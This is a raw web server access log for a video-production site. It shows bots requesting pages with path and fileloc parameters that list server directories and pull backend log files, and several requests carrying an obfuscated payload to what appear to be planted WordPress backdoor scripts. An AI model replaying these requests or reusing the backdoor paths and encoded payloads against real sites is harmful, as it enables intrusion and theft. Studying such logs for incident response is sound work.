74.7.227.189 - - [10/Nov/2025:00:32:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory2 HTTP/1.1" 200 3391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:33 +0000] "GET /66mni24892.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.194.14.255 - - [10/Nov/2025:00:32:33 +0000] "GET /our-works/phim-viral-ila/?path=//sys/module/binfmt_misc HTTP/1.1" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:32:34 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/subsystem HTTP/1.1" 200 3197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:34 +0000] "GET /193irs1121.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.132.10 - - [10/Nov/2025:00:32:35 +0000] "GET /?products=889756 HTTP/1.1" 200 4544 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.189 - - [10/Nov/2025:00:32:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory5/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:36 +0000] "GET /118ayvyt6170.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.207.207.36 - - [10/Nov/2025:00:32:36 +0000] "GET /our-works/tvc-calci/?path=//sys/class/leds/input1::numlock HTTP/1.1" 200 3201 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:32:37 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory2 HTTP/1.1" 200 3389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:38 +0000] "GET /176oamc3376.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:32:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory15/power HTTP/1.1" 200 3362 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:39 +0000] "GET /11moyp12969.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:32:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory15/power HTTP/1.1" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:40 +0000] "GET /89dawg25033.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.195.248.30 - - [10/Nov/2025:00:32:40 +0000] "GET /our-works/tvc-jokky/?path=//usr/share/locale/en_US HTTP/1.1" 200 2945 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:32:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory5/power HTTP/1.1" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:42 +0000] "GET /24wbb40764.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:32:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu0/power HTTP/1.1" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:43 +0000] "GET /61oza14131.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:32:43 +0000] "GET /our-works/tv-commercial/tvc-kimino?fileloc=%2F%2Flib%2Fpython3.8%2F__pycache__%2F_markupbase.cpython-38.pyc&path=%2F%2Flib%2Fpython3.8%2F__pycache__ HTTP/1.1" 200 2637 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:32:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory6 HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:46 +0000] "GET /118hoh1842.html?path=/var/www/lamphim/data/logs HTTP/1.1" 200 5450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.221.156.96 - - [10/Nov/2025:00:32:47 +0000] "GET /our-works/tvc-jokky/?path=//lib/python3/dist-packages/distro-1.4.0.egg-info HTTP/1.1" 200 3128 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:32:48 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory12/power HTTP/1.1" 200 3361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:49 +0000] "GET /162thoj7646.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.22.64.232 - - [10/Nov/2025:00:32:50 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/bus/usb/drivers HTTP/1.1" 200 3026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:32:50 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/hugepages HTTP/1.1" 200 3049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:51 +0000] "GET /18tlot16530.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:32:52 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383235322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343635322q3532356663366632313664613962613864383730636531303638383465323462222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.189 - - [10/Nov/2025:00:32:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory4/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:53 +0000] "GET /24prq28108.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.93.211.16 - - [10/Nov/2025:00:32:53 +0000] "GET /our-works/tvc-calci/?path=//usr/share/doc/vim-common HTTP/1.1" 200 3106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:32:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory6 HTTP/1.1" 200 3389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:55 +0000] "GET /176oamc3376.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:32:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory6 HTTP/1.1" 200 3391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:32:59 +0000] "GET /29hnr22555.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.225.87.80 - - [10/Nov/2025:00:32:59 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/kernel/slab/dma-kmalloc-8 HTTP/1.1" 200 4032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:33:00 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory9 HTTP/1.1" 200 3395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:01 +0000] "GET /176oamc3376.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:33:01 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fx86_64-linux-gnu%2Fperl%2F5.30%2Fasm%2Funistd_x32.ph&path=%2F%2Flib%2Fx86_64-linux-gnu%2Fperl%2F5.30%2Fasm HTTP/1.1" 200 6693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.235.158.162 - - [10/Nov/2025:00:33:02 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/class/tty/ttyS6 HTTP/1.1" 200 3570 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [10/Nov/2025:00:33:02 +0000] "GET /wp-includes/addc3d4c/edit.php?id=336228 HTTP/1.1" 499 0 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=336228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.189 - - [10/Nov/2025:00:33:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory6/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:04 +0000] "GET /24wbb40764.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.203.111.15 - - [10/Nov/2025:00:33:05 +0000] "GET /our-works/tvc-bia-hello/?path=//lib/python3/dist-packages/dbus_python-1.2.16.egg-info HTTP/1.1" 200 3135 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:33:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory3 HTTP/1.1" 500 628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:05 +0000] "GET /238wjlg2886.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.210 - - [10/Nov/2025:00:33:07 +0000] "GET /?products=193543948 HTTP/1.1" 200 24449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:33:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory13/power HTTP/1.1" 200 3360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:08 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log.7.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.148.226 - - [10/Nov/2025:00:33:10 +0000] "GET /our-works/tvc-lapatie-2/?path=//var/cache/snapd/icons-pool HTTP/1.1" 200 3071 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:11 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.2.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory6/power HTTP/1.1" 200 3353 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:12 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.3.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory5 HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.216.227.216 - - [10/Nov/2025:00:33:13 +0000] "GET /our-works/corporate/marina-plaza/?path=//etc/apparmor/init HTTP/1.1" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:14 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.5.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:33:17 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383237372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343637372q3833613262633839666431646237663838383766306333663964323963316636222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:33:17 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.9.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory10/power HTTP/1.1" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:33:18 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fmisc%2Flkdtm HTTP/1.1" 200 2984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.202.233.37 - - [10/Nov/2025:00:33:19 +0000] "GET /our-works/tvc-lapatie-2/?path=//sys/class/tty/ttyS16 HTTP/1.1" 200 3572 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:21 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.4.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory3 HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.194.14.255 - - [10/Nov/2025:00:33:24 +0000] "GET /our-works/tvc-calci/?path=//snap/lxd/current/usr HTTP/1.1" 200 2931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:24 +0000] "GET /238wjlg2886.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory11/power HTTP/1.1" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.154.211 - - [10/Nov/2025:00:33:26 +0000] "GET /?products=889150 HTTP/1.1" 200 4544 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
98.83.72.38 - - [10/Nov/2025:00:33:26 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/class/vtconsole/vtcon1 HTTP/1.1" 200 3128 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:27 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.6.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory6 HTTP/1.1" 200 3389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:28 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.error.log.7.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory7 HTTP/1.1" 200 3395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.192.125.239 - - [10/Nov/2025:00:33:29 +0000] "GET /our-works/tvc-lapatie-2/?path=//usr/lib/systemd/user-environment-generators HTTP/1.1" 200 3035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:30 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log.9.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory13/power HTTP/1.1" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:31 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log.3.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory3/power HTTP/1.1" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:32 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log.5.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory3 HTTP/1.1" 200 3396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.29.160.53 - - [10/Nov/2025:00:33:33 +0000] "GET /our-works/tvc-calci/?path=//snap/snapd/current/etc HTTP/1.1" 200 3008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:34 +0000] "GET /238wjlg2886.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:33:34 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fweb-auth HTTP/1.1" 200 3078 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:33:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory3/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:37 +0000] "GET /238wjlg2886.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/hugepages HTTP/1.1" 200 3048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:33:40 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383330302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343730302q3239653130346563343534333861653537653336383134656532376630343265222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
